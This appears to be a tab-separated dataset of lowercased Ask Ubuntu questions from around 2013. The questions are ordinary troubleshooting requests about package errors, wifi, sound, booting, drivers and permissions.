375613	ubuntu saucy : what is the default console tool for parsing xml ?	i used xmllint package for parsing xml files . also , i know , that we can use xml2 , xmlstarlet too . but i do not see those packages in ubuntu saucy . does saucy contain any default xml parsers ? i need parse xml file one time and i do no want install addition packages for this .
375615	ubuntu 12.04 python problem or ?	hi i am trying to fix this for a long time but without success . when i open my zsh terminal i get this error : ( terminal is working but error appear ) welcome to the world of tomorrow ! virtualenvwrapper_run_hook:12 : permission denied : virtualenvwrapper.sh : there was a problem running the initialization hooks . if python could not import the module virtualenvwrapper.hook_loader , check that virtualenv has been installed for virtualenvwrapper_python= and that path is set properly . i tried few things but ... dont know how to solve it . somehow during looking for a search i found i should post here an output of : â sudo dpkg -- configure -a setting up python-pip ( 1.0-1build1 ) ... /var/lib/dpkg/info/python-pip.postinst : 6 : /var/lib/dpkg/info/python-pip.postinst : pycompile : not found dpkg : error processing python-pip ( -- configure ) : subprocess installed post-installation script returned error exit status 127 setting up libc-dev-bin ( 2.15-0ubuntu10.5 ) ... setting up gnome-control-center-data ( 1:3.4.2-0ubuntu0.13 ) ... setting up linux-libc-dev ( 3.2.0-56.86 ) ... setting up python-virtualenv ( 1.7.1.2-1 ) ... /var/lib/dpkg/info/python-virtualenv.postinst : 6 : /var/lib/dpkg/info/python-virtualenv.postinst : pycompile : not found dpkg : error processing python-virtualenv ( -- configure ) : subprocess installed post-installation script returned error exit status 127 setting up libglib2.0-0 ( 2.32.4-0ubuntu1 ) ... setting up libglib2.0-0 : i386 ( 2.32.4-0ubuntu1 ) ... setting up gimp ( 2.6.12-1ubuntu1.2 ) ... /var/lib/dpkg/info/gimp.postinst : 11 : /var/lib/dpkg/info/gimp.postinst : pycompile : not found dpkg : error processing gimp ( -- configure ) : subprocess installed post-installation script returned error exit status 127 setting up libpolkit-gobject-1-0 ( 0.104-1ubuntu1.1 ) ... setting up libgnome-control-center1 ( 1:3.4.2-0ubuntu0.13 ) ... setting up libnm-util2 ( 0.9.4.0-0ubuntu4.3 ) ... setting up libc6-dev ( 2.15-0ubuntu10.5 ) ... setting up libpulse-mainloop-glib0 ( 1:1.1-0ubuntu15.4 ) ... dpkg : dependency problems prevent configuration of virtualenvwrapper : virtualenvwrapper depends on python-virtualenv ; however : package python-virtualenv is not configured yet . dpkg : error processing virtualenvwrapper ( -- configure ) : dependency problems - leaving unconfigured setting up libpolkit-agent-1-0 ( 0.104-1ubuntu1.1 ) ... setting up libupower-glib1 ( 0.9.15-3git1ubuntu0.1 ) ... setting up libaccountsservice0 ( 0.6.15-2ubuntu9.6.1 ) ... setting up libpolkit-backend-1-0 ( 0.104-1ubuntu1.1 ) ... setting up libglib2.0-bin ( 2.32.4-0ubuntu1 ) ... setting up libnm-glib4 ( 0.9.4.0-0ubuntu4.3 ) ... setting up policykit-1 ( 0.104-1ubuntu1.1 ) ... setting up gnome-settings-daemon ( 3.4.2-0ubuntu0.6.4 ) ... setting up accountsservice ( 0.6.15-2ubuntu9.6.1 ) ... dpkg : error processing ubuntu-system-service ( -- configure ) : package is in a very bad inconsistent state - you should reinstall it before attempting configuration . processing triggers for libc-bin ... ldconfig deferred processing now taking place errors were encountered while processing : python-pip python-virtualenv gimp virtualenvwrapper ubuntu-system-service also : â python -- version zsh : command not found : python part of my ~/.zshrc # python virtual env wrapper if [ -f ~/.local/bin/virtualenvwrapper.sh ] ; then export workon_home=~/.virtualenvs source ~/.local/bin/virtualenvwrapper.sh plugins= ( `` $ { plugins [ @ ] } '' virtualenvwrapper ) fi # pythonbrew [ [ -s ~/.pythonbrew/etc/bashrc ] ] & & source ~/.pythonbrew/etc/bashrc part os zsh -xv # # invoke the initialization functions # virtualenvwrapper_initialize +/home/trki/.local/bin/virtualenvwrapper.sh:1179 > virtualenvwrapper_initialize +virtualenvwrapper_initialize:1 > virtualenvwrapper_derive_workon_home +virtualenvwrapper_derive_workon_home:1 > typeset 'workon_home_dir=/home/trki/.virtualenvs' +virtualenvwrapper_derive_workon_home:5 > [ /home/trki/.virtualenvs '= ' '' ' ] ' +virtualenvwrapper_derive_workon_home:12 > echo /home/trki/.virtualenvs +virtualenvwrapper_derive_workon_home:12 > unset grep_options +virtualenvwrapper_derive_workon_home:12 > grep '^ [ ^/~ ] ' +virtualenvwrapper_derive_workon_home:21 > echo /home/trki/.virtualenvs +virtualenvwrapper_derive_workon_home:21 > unset grep_options +virtualenvwrapper_derive_workon_home:21 > egrep ' ( [ \ $ ~ ] |// ) ' +virtualenvwrapper_derive_workon_home:30 > echo /home/trki/.virtualenvs +virtualenvwrapper_derive_workon_home:31 > return 0 +virtualenvwrapper_initialize:1 > export 'workon_home=/home/trki/.virtualenvs' +virtualenvwrapper_initialize:3 > virtualenvwrapper_verify_workon_home -q +virtualenvwrapper_verify_workon_home:1 > rc=0 +virtualenvwrapper_verify_workon_home:2 > [ ! -d /home/trki/.virtualenvs/ ' ] ' +virtualenvwrapper_verify_workon_home:11 > return 0 +virtualenvwrapper_initialize:6 > [ /home/trki/.virtualenvs '= ' '' ' ] ' +virtualenvwrapper_initialize:11 > virtualenvwrapper_run_hook initialize +virtualenvwrapper_run_hook:1 > typeset hook_script +virtualenvwrapper_run_hook:2 > typeset result +virtualenvwrapper_run_hook:4 > hook_script=+virtualenvwrapper_run_hook:4 > virtualenvwrapper_tempfile initialize-hook +virtualenvwrapper_tempfile:2 > typeset 'suffix=initialize-hook' +virtualenvwrapper_tempfile:3 > typeset file +virtualenvwrapper_tempfile:5 > file=+virtualenvwrapper_tempfile:5 > virtualenvwrapper_mktemp -t virtualenvwrapper-initialize-hook-xxxxxxxxxx +virtualenvwrapper_mktemp:1 > mktemp -t virtualenvwrapper-initialize-hook-xxxxxxxxxx +virtualenvwrapper_tempfile:5 > file=/tmp/virtualenvwrapper-initialize-hook-ohy86pxmo7 +virtualenvwrapper_tempfile:6 > [ 0 -ne 0 ' ] ' +virtualenvwrapper_tempfile:6 > [ -z /tmp/virtualenvwrapper-initialize-hook-ohy86pxmo7 ' ] ' +virtualenvwrapper_tempfile:6 > [ ! -f /tmp/virtualenvwrapper-initialize-hook-ohy86pxmo7 ' ] ' +virtualenvwrapper_tempfile:11 > echo /tmp/virtualenvwrapper-initialize-hook-ohy86pxmo7 +virtualenvwrapper_tempfile:12 > return 0 +virtualenvwrapper_run_hook:4 > hook_script=/tmp/virtualenvwrapper-initialize-hook-ohy86pxmo7 +virtualenvwrapper_run_hook:11 > cd /home/trki/.virtualenvs +cd:1 > [ [ x/home/trki/.virtualenvs == x ... ] ] +cd:3 > [ [ x/home/trki/.virtualenvs == x ... . ] ] +cd:5 > [ [ x/home/trki/.virtualenvs == x ... .. ] ] +cd:7 > [ [ x/home/trki/.virtualenvs == x ... ... ] ] +cd:9 > [ -d /home/trki/.autoenv ' ] ' +cd:13 > cd /home/trki/.virtualenvs +virtualenvwrapper_run_hook:12 > '' -m virtualenvwrapper.hook_loader -- script /tmp/virtualenvwrapper-initialize-hook-ohy86pxmo7 initialize virtualenvwrapper_run_hook:12 : permission denied : +virtualenvwrapper_run_hook:15 > result=126 +virtualenvwrapper_run_hook:17 > [ 126 -eq 0 ' ] ' +virtualenvwrapper_run_hook:27 > [ initialize '= ' initialize ' ] ' +virtualenvwrapper_run_hook:29 > cat - virtualenvwrapper.sh : there was a problem running the initialization hooks . if python could not import the module virtualenvwrapper.hook_loader , check that virtualenv has been installed for virtualenvwrapper_python= and that path is set properly . +virtualenvwrapper_run_hook:38 > rm -f /tmp/virtualenvwrapper-initialize-hook-ohy86pxmo7 +virtualenvwrapper_run_hook:39 > return 126 +virtualenvwrapper_initialize:13 > virtualenvwrapper_setup_tab_completion +virtualenvwrapper_setup_tab_completion:1 > [ -n '' ' ] ' +virtualenvwrapper_setup_tab_completion:20 > [ -n 4.3.17 ' ] ' +virtualenvwrapper_setup_tab_completion:30 > compctl -k _virtualenvs workon rmvirtualenv cpvirtualenv showvirtualenv +virtualenvwrapper_setup_tab_completion:31 > compctl -k _cdvirtualenv_complete cdvirtualenv +virtualenvwrapper_setup_tab_completion:32 > compctl -k _cdsitepackages_complete cdsitepackages +virtualenvwrapper_initialize:15 > return 0 +/home/trki/.zshrc:17 > plugins= ( git python django symfony2 zsh-syntax-highlighting composer history-substring-search virtualenvwrapper ) # pythonbrew [ [ -s ~/.pythonbrew/etc/bashrc ] ] & & source ~/.pythonbrew/etc/bashrc +/home/trki/.zshrc:21 > [ [ -s /home/trki/.pythonbrew/etc/bashrc ] ] also when i try to open ubuntu software center absolutly nothing happens . no idea what to do now .
375620	ubuntu not on bootdisk	okay . i 'm trying to usb boot ubuntu 12.4.3 , and the current os ( osx mavericks ) will not allow me to do so from the boot options . might be a new feature of osx , but i doubt it . i followed every instruction from the on site instructions on making a usb boot drive , and the system terminal did exactly what it was supposed to , but when i restart , it claims that the usb does not have a loadable os . any guesses ?
375621	brightness 0 % on lenovo g500s on startup / boot	i 've installed ubuntu 12.04 on a lenovo g500s laptop . the screen is scrambled/shows weird artefacts during boot but that does n't really bother me . what does is this : the screen 's brightness is always 0 % on boot , which means that it is pitch black . i 've already searched this site and found two suggestions : echo 50 > /sys/class/backlight/acpi_video0/brightness in /etc/rc.local /usr/bin/xbacklight -set 50 in /etc/rc.local both work fine ( affect the screen 's brightness ) when i execute them from the terminal , but when i put either of them in /etc/rc.local the display will still be pitch black on the login screen after a reboot . any suggestions ?
375624	gui/libgui.a ( x.o ) : undefined reference to symbol 'xsetforeground ' when compiling bosh	i need to compile bochs from source , i 've already run this command : ./configure -- with-x11 -- with-wx -- enable-ne2000 -- enable-gdb-stub -- enable-disasm -- enable-e1000 -- enable-usb -- enable-pci now it 's time to run make.. after a while i get this error : /usr/bin/ld : gui/libgui.a ( x.o ) : undefined reference to symbol 'xsetforeground' /usr/lib/x86_64-linux-gnu/libx11.so.6 : error adding symbols : dso missing from command line collect2 : error : ld returned 1 exit status any clue ?
375625	ubuntu on archos xenon 80	please help me to install ubuntu on my archos xenon 80.i have tried to install the file available for touch tablet and no result . successfully installed it via clockwork mod recover but it does not boot up . this device has the chipset of qualcomm s4 play .
375631	ubuntu 12.04 suspend not working	suspend mode is not working on my computer . when i suspend my pc , shortly it comes back to its previous state . motherboard is asus p5n-mx
375632	why does the run level change automatically ?	i am trying set up a virtual machine as an exercise for my friend , it came to my mind that i can give him a machine that reboots all the time and ask him to find out whats wrong with it . i change run level by init 2 but it goes back to normal how can i achieve my goal ? and how would he be able to diagnose the problem ?
375633	run 12.04 and 13.10 with windows 8	is it possible to run two or more instances of ubuntu on the same system , in addition to windows 8 ?
375635	unable to install juju-gui locally ?	i 'm attempting to setup juju-gui in a vm running ubuntu 13.10 x64 server . i intend to see if it 's possible to deploy an openstack `` all in one '' node , using this method in that particular vm . i 've installed and bootstrapped juju in a local environment : sudo apt-get install juju-core sudo apt-get install juju-local juju switch local sudo juju bootstrap next i 've executed the following : juju deploy juju-gui juju expose juju-gui watch juju status i was expecting to see juju-gui open up some ports and become available via a web-browser but nothing like that happened - why ? how do i fix that ? i believe i 've managed to follow the deployment guides to the letter ? are there any detailed walkthroughs regarding deploying openstack on 13.10 , using juju ?
375638	ubuntu 13.10 dash	is there a way to customize the shopping url for my country . by default if i type ebay : vanity in the dash it returns results from ebay.com i am in australia and i want to search ebay.com.au
375640	no analog audio in 13.10	i 've installed 13.10 on a machine that was previously running windows 8 , and audio output is n't working out of the box . it worked fine in windows , and the speakers work fine when hooked up to a laptop , so it must an incompatibility between ubuntu and the motherboard . if i go to sound settings , `` built-in audio '' is selected ( spdif is also available ) . this is an intel z77 motherboard with an integrated creative ca0132 sound chipset . i 've tried booting a live image of 13.10 ( to check for a corrupt install ) , and the same problem exists . if i boot a live image of 13.04 , the only audio output listed in sound settings is a `` dummy '' card . i 've already tried basic troubleshooting steps , such as removing pulseaudio config directories , force-restarting alsa , and making sure the speakers are n't muted in the alsa mixer . at this point , i 'm totally stumped : ( edit : well , i turned on my computer this morning and heard the familiar ubuntu `` ka-dunk-ka-chunk '' . it seems that a hard power cycle ( power off , power on ) fixes this . simply restarting does not . but it always seems to come back .
375642	cinnamon broke unity and kde on ubuntu 13.10	something after installing cinnamon has screwed up my ability to use unity and kde on ubuntu 13.10 . when i try to log in to either i get an error that dbus could not start . any ideas what has happened ? when i try to log in to kde i get : `` could not start d-bus . can you call qbus ? ''
375643	how to get wna3100 working	i'v recently installed ubuntu 12.10 64 bit and all i have is wireless so i ca n't do it the easy way can some one tell me what i need or what i should do ? the adapter is a netgear wna3100 . ps : i only have one way of internet is by my windows 7 hard drive
375646	password problems	whenever i try to change settings for the admin account or download any files/programs it asks for a password . i do not know/remember this password . i 've tried resetting it and making a new account using root , but it wont let me . when i try to change my password , this comes up . `` authentication token manipulation error '' . i would greatly appreciate some help in this matter .
375647	loss of sound in ubuntu 12.04	i 'm running linux e6520 3.2.0-56-generic # 86-ubuntu smp wed oct 23 09:20:45 utc 2013 x86_64 x86_64 x86_64 gnu/linux on a dell latitude e6530 . ( this is a new machine ; have run the same version of linux on an older machine for a year , without this happening . ) i 've been losing sound regularly , though have not been able to isolate the trigger for this . i 've scoured the web on this subject , in particular https : //help.ubuntu.com/community/soundtroubleshootingprocedure and audio stopped working suddenly in 12.04 nothing from the first site seemed to work for me . from the second site , i learned enough to be able to fix the problem when it happens , but nothing on the web has helped me figure out why the problem is happening in the first place . patching together stuff from the web , and with some blind luck , i 've found that the following steps seem to restore sound pulseaudio -- kill pulseaudio -- start pavucontrol - > output devices click on the `` mute audio '' icon , which mutes audio click on the `` mute audio '' icon , which unmutes audio . this obviously does n't make sense : audio was n't muted in the first place , but somehow , magically , toggling mute audio off and on seems to reset something . can anybody suggest from this information why sound would be disappearing in the first place ( it seems as though something is getting muted at the system level , but i do n't know what ) ? a simpler ( command-line/script ) way of restoring sound , in particular , is it possible to reset pavucontrol from the commandline ? some other pieces of information that may be of use : the problem is clearly happening at the system level , since i 've set up a clean new user , and this user has the same problems that i do . so user fixes like deleting the .pulse directory are n't ( and do n't ) help . sound works fine in windows ( dual-boot ) so it 's not a hardware problem any help/suggestions on this would be most appreciated .
375648	what 's responsible for dash online lookups ? -- i want to uninstall it	to ensure privacy/security of my data & searches , i do n't feel it 's adequate to just disable online lookups . i prefer to uninstall whatever provides this functionality . is there something ( like a package/s ) i can uninstall to disable/prevent all online lookups when using the dash ?
375653	making a bash script that reconnect to ap when connection lost	i 'm facing problems with wifi on ubuntu i tried to update the system but still the same what happens is that i suddenly lose the connection with my router and when i press on the wifi bar the system wo n't detect any aps i have to uncheck `` enable wifi '' option , then re check it so it work , it automatically reconnect . i 'm thinking of making a bash script that detects when the pc is disconnected from the router for any reason , and when it is disconnected it disable then enable the wifi . i mean like automating resetting the connection that possible ? i guess i must use this nmcli nm wifi off nmcli nm wifi on but how can i make the script know if the pc is disconnected from the wifi ?
375654	help , can not calibrate camera	i have a problem calibrating my camera . it does not let me set a color theme , scheme or anything ... i also ca n't calibrate it through skype ... i would like someone to help me with a solution . thanks
375659	why was altera pcie vid did removed in 12.04lts	10.04lts supported altera pcie vid = 0x1172 did = 0xe001 12.04lts removed altera pcie vid = 0x1172 did = 0xe001 why it was removed ?
375660	error scripts at start up.. not it wont start ubuntu at all	for a while now i keep getting these little error scripts at start up . they never seem to effect start up much so i was n't really concerned with it until fairly recently and now it wont start ubuntu at all . i 've seen two different error scripts at start up , the first when it first started up and the second every time after that . i did n't record the first one but here 's the second one : [ 51.872133 ] ata1.0 : exception emask 0x0 sact 0x0 action 0x6 frozen [ 51.872220 ] ata1.00 : failed command : read dma [ 51.872274 ] ata1.00 : cmd c8/00:00:10:00:80/00:00:00:00:00/e9 tag 0 dma131072 in [ 51.872274 ] res 40/00:80:00:00:00/00:00:00:00:00/40 emask 0x4 ( timeout ) [ 51.872425 ] ata1.00 : status : { drdy ] [ 51.908165 ] ata1.00 srst failed ( errno=-6 ) i had been having other small issues with my computer as well , most of them just minor and annoying . yesterday though it kept freezing when i was trying to move data around and i kept having to force it to restart ( otherwise the screen would just stay frozen , i let it sit like that for 2 hours once ) . is there any way to fix this ? i ca n't use my computer at all until its fixed and i need it for work .
375662	having problems updating my flash player	i have been trying to figure this one out with the questions already asked about flash player but were not able to do it . if i go to this site https : //www.mozilla.org/en-us/plugincheck/ it will say that my shockwave flash 11.2 r202 is no up to date . so i pressed update now and got the .tar.gz file . typed in about : plugins in firefox and got the path for my flashplayer to be /usr/lib/flashplugin-installer/libflashplayer.so . went in through the command line and first renamed to old libflashplayer.so to libflashplayer.so100 and then copied the new one in to the folder . restarted firefox but it still says that i have an outdated version of flash . am i even doing it right ? is there a apt-get command to get the latest update for flash player ? because my youtube and so on runs slow so i figured its because i dont have the latest update . thanks .
375666	black screen while installing ?	i 'm trying to install ubuntu on a acer aspire v6 laptop with intel ( r ) hd graphics 4000 using a usb drive from kingston . booting from the usb i can see the purple screen for a few seconds then the screen goes black . i can still hear the ubuntu login sound just no display . version trying to install : ubuntu 13.10 what can be causing this/how can i fix it ? thank you .
375668	surface pro internal wifi adapter not working	the bluetooth/wifi adapter ( marvell avastar 350n ( 88w8797 ) ) from the surface pro is not working anymore . it was working fine a couple days ago . i followed this user 's post and it still would n't work . i have tried different fixes that i could find here on the forums but nothing worked . could it be related to ubuntu turning it off to save power ? on windows i was having the same issue and i disabled that option and it immediately started working again .
375672	why ca n't i put music on my ipod in banshee	i have some songs in my banshee library and i have tried multiple times to put songs on my ipod . i move them to the ipod and banshee says it was a success , but the songs are not on the ipod . can someone help me out ?
375675	every time i try to upgrad from the old disk i installed i get an error message	extracting the upgrade failed . there may be a problem with the network or with the server . is what i keep seeing when i try to update . i have a very old version of ubuntu and have no idea about how to install a new version . i tried to put it on a usb ( a new version . ) but it wo n't boot off the usb when i select it . please help ! i am a total layman with ubuntu and it came with my computer . i do not understand ios . so please explain very layman for me or dummy it down please . i am usually able to figure things out by myself but i have given up fixing this on my own . i searched for this but could not understand the answer from a similar case . it comes up with a failed to list too . it has tons of failed to fetch links . is there any way to solve this ?
375677	wifi keep disconnecting every 5 min on dell inspiron15r	need urgent help , i am new to ubuntu and using 12.04 . my wifi keep disconnecting after a while when i start my machine , i always need to restart the system to get connected and again it gets disconnected in 2 min . sometime when i restart it shows no wifi availability and the after few trials of restarting , it fortunately gets connected . it happened not only @ my home but at my college as well . its damn irritating that when i am writing an email and suddenly the wifi get disconnect . i am using dell inspiron 15r . please help me out . i googled it a lot but could not find a solution , i read a solution of reversing the ip but i didnt get what and how to do it .
375678	mutiple music player play pause toggle problem	in my setup i use xfce . xfce does not have any method to control the playing and pausing of music players , so i wrote my own script to control the play\pause , next , and previous commands . the problem is that sometimes when i hit the shortcut it toggles the players for example i 'm playing pithos , i hit play\pause and guayadeque starts playing . so i am wondering what kind of program i could write in bash that might manage this in a more intelligent manor . this should ideally pause only the current player , not toggle players , and be maybe have some current active player control .
375681	why does the ubuntu ipv6 torrent tracker not track any releases newer than ubuntu 12.10 ?	the ubuntu ipv6 bittorrent tracker ( http : //ipv6.torrent.ubuntu.com:6969/announce ) does not track any releases newer than ubuntu 12.10 . when trying to announce e.g . ubuntu-13.10-desktop-amd64.iso , the tracker response is : failure : requested download is not authorized for use with this tracker . note , that the ipv6 announce url is included in the 13.10 torrent file . accordingly , http : //ipv6.torrent.ubuntu.com/ does n't list anything newer than ubuntu 12.10 . ( note : the link works under ipv6 only )
375684	kernel panic after installing fglrx	i suppose i should have learned from the last time but i tried to get ati drivers ( ie fglrx ) again for my dell inspiron 1545 that has an ati radeon mobility hd4330 card . i know now that this card does not have proprietary drivers updated for it ... so no 3d apps for me . anyhow , i have installed fglrx in the past and rendered ubuntu 13.04 unusable . i fixed by running another install over the existing installation ( ie . no format ) in the `` something else '' option . that did the trick . well , i tried installing ati catalyst drivers again and things went sideways again . this after updating to 13.10 a couple of weeks earlier . i ca n't load into ubuntu and after another attempt at reinstalling i now get this lovely message which i ca n't fix with re-installing : run-int : /sbin/init : exec format error [ 3.590338 ] kernel panic - not syncing : attempted to kill init ! exitcode= 0x0000010 [ 3.590338 ] i 've done a lot of searching and ca n't seem to find any one fix that helps me ... ( and i 'm a little concerened that i 've monkeyed with things more than i should ... haha ! ) bottom line : i ca n't get past this kernel panic notice to fix things ... .any help would be greatly appreciated . thanks !
375685	how do i track down a file 's location from unity search ?	so my problem is that , while installing eclipse , i created some desktop files in different locations , installing them all ( i was trying to solve a bug , hence the need for repeatedly installing .desktop files . somewhere along the line i must have created one in an alternate directory ) . but anyways , my dilemma now is that when i search `` eclipse '' from unity search i get two icons in the results . one is the one i wanted to use ( i.e . the .desktop file with the correct settings , arguments ) , and the other is absolutely useless . however for the life of me , i ca n't figure out where the useless entry is located . i 've tried just using nautilus 's search to find .desktop files , but it only gives me the correct .desktop file . i have no idea where the .desktop with the incorrect information is located ; the only way i can locate it is through the search bar of unity . i 'm reasonably sure that i 've created a soft link to it in my bin ; not sure though . anyways , my question here is whether there 's some way to locate files from unity search . dragging the result into terminal doesnt seem to work , and the search feature is supremely unhelpful concerning file paths . [ subquestion with no real answer ] : i 'm also looking for a better desktop environment . i really hate having to make .desktop files just to get a program into the unity toolbar , and long for just being able to drag-and-drop a program in like windows . any help here ? anyways , thanks !
375686	secure boot and eufi ?	is eufi and secure boot supported for ubuntu ? i am trying to dual boot windows 8 and ubuntu and would like to know if i need to change eufi and secure boot or if i can leave it on .
375687	truecrypt icon will not run - nothing happens	clicking the truecrypt icon results in no . so : - if i type 'truecrypt ' at a terminal prompt i get : bash : /usr/bin/truecrypt : can not execute binary file if i type sudo truecrypt at a terminal prompt i get : /usr/bin/truecrypt : 1 : /usr/bin/truecrypt : syntax error : `` ) '' unexpected my methodology was : - i downloaded the truecrypt-7.1a-setup-x64.tar.gz from the truecrypt site extracted it and ran truecrypt-7.1a-setup-x64 get windox xmessage text and then 3 options exit extract .tar package file install truecrypt < < i choose it seemed to run ok and created the blue icon etc .
375689	no wifi-boot problems-webcam	evening : since install of 12.04 ( over a month ago ) can not get wireless . laptop indicates it 's receiving , updates current , installed all `` restricted extras '' , clicked 'enable wireless '' what else do i need to do ? ( hp2000-210us ) also , how can i flash bios ? hp will not support ubuntu ! ! one other problem i 'm not getting an answer to , can not boot from cd or pendrive . set `` boot order '' to comply to each device . each device is `` bootable '' ( checked on another machine ) . i used to run xubuntu 12.04 from pendrive . then one day i got `` mbr is missing '' . got an hdd and did install of 12.04 , but still not bootable from either cd or pendrive ? ? i 've been all over searching various ubuntu ? linux sites on how to activate internal webcam . it does work , within gmail , but how do i activate/use it outside of gmail ? if you could help with these problems , it would be greatly appreciated . ubuntu should n't be this difficult to operate . thank you rick
375690	how to disable the default apache server	i recently installed lampp and apache is unable to start because there is another web server already running . how do i disable whatever default server might be running in ubuntu 12.04 ?
375692	suitable ubuntu distribution	i need help choosing a suitable distrbution for my pc . i am using an hp d530 cmt with : ⠀• cpu type : intel pentium 4 , 3000 mhz ( 15 x 200 ) ⠀• motherboard chipset : intel springdale-g i865g ⠀• system memory : 1015 mb ( pc3200 ddr sdram ) ⠀• video adapter : intel ( r ) 82865g graphics controller ( 96 mb ) ⠀• 3d accelerator : intel extreme graphics 2 ⠀• audio adapter : analog devices ad1981b ( l ) @ intel 82801eb ich5 - ac'97 audio controller ⠀• network adapter : broadcom netxtreme gigabit ethernet i have tried to install ubuntu 13.10 and 12.04 lts . everything is ok on ubuntu 12.04 except , that the video card was not recognized and the media player , youtube , etc . did not work properly .
375693	how to install mupen64plus on ubuntu 13.10 ?	ca n't seem to find a way to run mupen64plus on ubuntu 13.10 . kind of new to ubuntu , but i 've had previous experience . i can find it in the store but it 's not in my installed applications . please help . appreciated !
375694	trying to dual boot windows 8 and ubuntu without having to manualy partitioning , but installer ca n't find windows 8	i 'm completely new to linux . as the title suggests , i recently decided to make the switch from windows 8 ( it came installed in the laptop ) to ubuntu . i 've gone through pretty much all of the steps to dual-boot ubuntu with windows 8 . i made a bootable usb and manged to get the installer started . i did n't want to have to make my own partitions as i do n't really know how to , and i do n't want to mess up my laptop . the tutorial i was using said that the installer would see that i already had an os and would give me the option to dual boot . the only thing i needed to do was set how much space i wanted ubuntu to have . everything went smoothly until it came to that part . when i got to that screen , it said it could n't find any other os 's . the only option now is to either get it to find windows 8 , or to manually partition , which i 'd rather not do . any help would be appreciated . ps.here 's the website tutorial i followed ( i double checked on other sites too ) : http : //www.makeuseof.com/tag/tired-of-windows-8-how-to-dual-boot-windows-ubuntu/ thanks in advance !
375696	nvidia geforce4 mx 420 13.10	i have a dell dimdension 4550 i am trying to install ubuntu 13.10 onto . i really would like tokick microsoft to the curb , but i can not figure this out for the life of me . the graphics card is a nvidia geforce4 mx 420 . when i do a fresh install it works , but the system is unbearingly slow . when i check the system monitor the cpu is pegging out t 95 % -100 % usage . when i check the hardwade it says there is a problem with compiz . i tried multiple sugeestion to get the latest drivers , but when i install and reboot i get a black screen and nothing haapens . any suggestions i truly would appreciate it . thanks in advance
375698	reinstall windows 8 on clean ubuntu hard drive	for a moth ago , i took a clean install of ubuntu 13.10 , i formated the entire hard drive that contained windows 8 and installed ubuntu . now i want to reinstall windows 8 , but when i boot up with a bootable usb , my computer wont recognize the bootable usb unless its a bootable linux usb ... i have done a little bit research and i think it have something with mbr to do , but i have no idea what to do ! please help : )
375700	ppa 404 error when installing flux on ubuntu 13.10	whenever i try and install flux ( in terminal ) and i type in `` sudo apt-get update '' , it says : failed to fetch http : //ppa.launchpad.net/kilian/f.lux/ubuntu/dists/saucy/main/binary-i386/packages 404 not found .
375701	how do i reinstate my admin user privileges to global read/write	i am running ubuntu 12.04 lts . i only have the one user which i created when i installed ubuntu . everything has been fine - love it - until i updated a software package recently from the command line using sudo ( not gksudo ) . i was having a little bother which did not make sense to me and in a fluff changed my user read/write privileges through the gui ( not even clear how i got there ! ) . after restart i was stuck in a login loop - using the right login password but kept getting looped back to the login and could only login as guest . i could still login with my user/password via ctrl + alt + f1 eventually i was able to login again at start up . not sure exactly what it was i changed that worked but it was one of/or a combination of installing latest security updates , changing login manager from lightdm to dgm and back again , removing the ice/xauthority and chown user . current dilemma is my primary admin user privileges were read only . in the command line ls -ls /home/user returned this value : drwx -- -- -- 48 username username 20480 i have since changed this using sudo chmod 0755 /home/username ( from my limited understanding 755 should return my user privileges to their original read/write glory ) . ls -ld /home/user currently shows my user privileges as : drwxr-xr-x 48 username username 20480 i still seem to have only read access permissions . i 've been through lots of threads ( and the help file ) that talk about creating new users/groups permissions etc . but specific info on returning my existing global/admin/primary users privileges to what they were when i first created that user - baffling me . i feel this is something really simple i 'm just not getting it . please help ! sudo mount /dev/sda1 on / type ext4 ( rw , errors=remount-ro ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /proc type sysfs ( rw , noexec , nosuid , nodev ) none on /sys/fs/fuse/connections type fusect1 ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) udev on /dev type devtmpfs ( rw , mode=07pe tmpfs55 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) none on /run/lock type tmpfs ( rw , , nosuid , nodev , size=5242880 none on /run/shm type tmpfs ( rw , nosuid , nodev ) gvfs-fuse-daemon on /home/meng/.gvfs type fuse.gvfs-fuse-daemon ( rw , nosuid , nodev , user=meng ) none on /tmp/guest-1r2fi5 type tmpsf ( rw , mode=700 )
375702	my hp deskjet 3510 has stopped printing	my hp desk jet 3510 has stopped printing . i 'm running ubuntu 12.04 , i tried uninstalling and reinstalling with no luck at all . the printer icon appears at the top right corner of my screen like it wants to start then the icon just vanishes , i will have the print queue open and the job starts then its gone , also the printer itself lights up like it wants to start and again nothing . i would appreciate any help at all thank you in advance .
375704	the gs package is not available , but some other package refers to it	first i want to say that any help is welcome and appreciated : i have ubuntu 13.04 and this problem happens when i am installing the package libraries lti - lib2 . the problem arises when you run the script ubuntu.sh lti - lib2and it gives me the following : install packages required for the lti -lib -2 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - using installation program 'apt -get' -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - compilation tools -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - debuggin framework -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - unit testing -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - libraries -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - hardware- related libraries -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - documentation tools -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - lapack -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - reading package lists ... done building dependency tree reading state information ... done the gs package is not available but referred to by another package him . this may mean that the package is missing , has been obsoleted , or is only available from another source e : the `` gs `` package has no installation candidate status : failed -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- some problems found . please check the messages , fix the problems , and retry . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 